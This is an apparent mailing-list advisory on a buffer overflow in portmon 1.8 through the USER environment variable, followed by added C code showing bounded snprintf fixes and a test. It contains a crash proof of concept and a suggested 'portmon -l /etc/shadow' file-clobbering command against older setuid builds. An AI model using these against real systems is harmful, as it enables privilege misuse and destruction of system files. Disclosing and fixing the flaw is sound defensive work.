-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
holo,
i find something when i try portmon out for a ride. this is the home
of portmon -
http://aboleo.net/software/portmon/
portmon is software that replaces shell script ping & cron to test the
hosts.
this is what i find -
portmon 1.8 and earlier buffer overflow:
[user@localhost]# export USER=`perl -e 'print "A" x 666'`
/* 110 suffice but i like 66 since the vendor is named old nik! ! */
[user@localhost]# /usr/local/bin/portmon -c devilzride.txt
Segmentation fault (core dumped)
bad code in portmon.c
sprintf(err_msg, "Portmon started by user %s\n", getenv("USER"));
err_msg is declared as -
err_msg = (char *)malloc(128 * sizeof(char));
1.8 is no longer suid root ! probably not an exploitation (in <=1.7)
becuz there is nothing on heap to write over and n1xo does not like to
use the free() (teehe, grep free turns up the dust , who needs the free()
anyhow!) .. maybe you find a way ?
USER is not a trusted one and you can spoof the logs or trash the files
by exploiting this guy in <1.8:
portmon -l /etc/shadow
see - http://www.securityfocus.com/archive/1/325653/2003-06-15/2003-06-21/0
fix :
n1xo said he made code to fix this one. ask him :
Nik Reiman <nik (at) aboleo (dot) net [email concealed]>
greetz :
ts (at) securityorfice (dot) net [email concealed] is the only one worth the props !
-----BEGIN PGP SIGNATURE-----
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 2.3
wkYEARECAAYFAj74zFIACgkQarKSBij8yIKdywCfdB0dk3LfrnMXjMYTPT4HSZwGRcoA
n0Z+Y3LYt1T8JKCWRYDCEIThCceo
=G6hd
-----END PGP SIGNATURE-----
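The root cause in the report is an unbounded sprintf() of the attacker-controlled USER variable into a 128-byte heap buffer. The following is an added example written for this page, not portmon's code or the fix the vendor shipped: it shows the two standard ways to build that message safely in C, snprintf() into the fixed buffer with a truncation check, or sizing the heap allocation from the formatted length. The function names, the ERR_MSG_LEN constant and the 666-byte test value are assumptions of the example; the format string and buffer size are taken from the post.

```c
/* Added example (not portmon's code): bounded construction of the start-up
 * message that portmon 1.8 built with sprintf() into a 128-byte heap buffer.
 * The environment variable USER is attacker-controlled, so its length must
 * never decide how many bytes are written. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define ERR_MSG_LEN 128  /* same size portmon allocated for err_msg */

/* Hypothetical replacement for the vulnerable sprintf() line.
 * Returns 0 on success, 1 if the message had to be truncated, -1 on error.
 * Never writes more than buflen bytes, whatever USER contains. */
int format_start_message(char *buf, size_t buflen, const char *user)
{
    if (buf == NULL || buflen == 0)
        return -1;
    if (user == NULL)            /* getenv() returns NULL when USER is unset */
        user = "(unknown)";
    int needed = snprintf(buf, buflen, "Portmon started by user %s\n", user);
    if (needed < 0)
        return -1;
    return ((size_t)needed >= buflen) ? 1 : 0;
}

/* Alternative: size the heap buffer from the input instead of truncating.
 * Caller frees the result. Returns NULL on failure. */
char *alloc_start_message(const char *user)
{
    if (user == NULL)
        user = "(unknown)";
    int needed = snprintf(NULL, 0, "Portmon started by user %s\n", user);
    if (needed < 0)
        return NULL;
    char *msg = malloc((size_t)needed + 1);
    if (msg == NULL)
        return NULL;
    snprintf(msg, (size_t)needed + 1, "Portmon started by user %s\n", user);
    return msg;
}

/* Constructed check: a 666-byte USER value, like the one in the report,
 * must not write past the 128-byte buffer. Returns 1 if behaviour is as expected. */
int check_oversized_user(void)
{
    char user[667];
    memset(user, 'A', 666);
    user[666] = '\0';

    char *err_msg = malloc(ERR_MSG_LEN);
    if (err_msg == NULL)
        return 0;
    int rc = format_start_message(err_msg, ERR_MSG_LEN, user);
    /* truncated, NUL-terminated, and exactly 127 characters long */
    int ok = (rc == 1) && (strlen(err_msg) == ERR_MSG_LEN - 1);
    free(err_msg);

    char *full = alloc_start_message(user);
    if (full == NULL)
        return 0;
    /* "Portmon started by user " is 24 chars, plus 666 A's, plus "\n" */
    ok = ok && (strlen(full) == 24 + 666 + 1) && (full[24 + 666] == '\n');
    free(full);
    return ok;
}

int main(void)
{
    char *msg = alloc_start_message(getenv("USER"));
    if (msg != NULL) {
        fputs(msg, stdout);
        free(msg);
    }
    return check_oversized_user() ? 0 : 1;
}
```

Both variants keep the environment value from controlling the write length; the truncating form is the drop-in for a fixed 128-byte err_msg, while the allocating form preserves the full message for the log. Either way the process no longer faults (or corrupts heap metadata) on an oversized USER, which is the condition the report triggers.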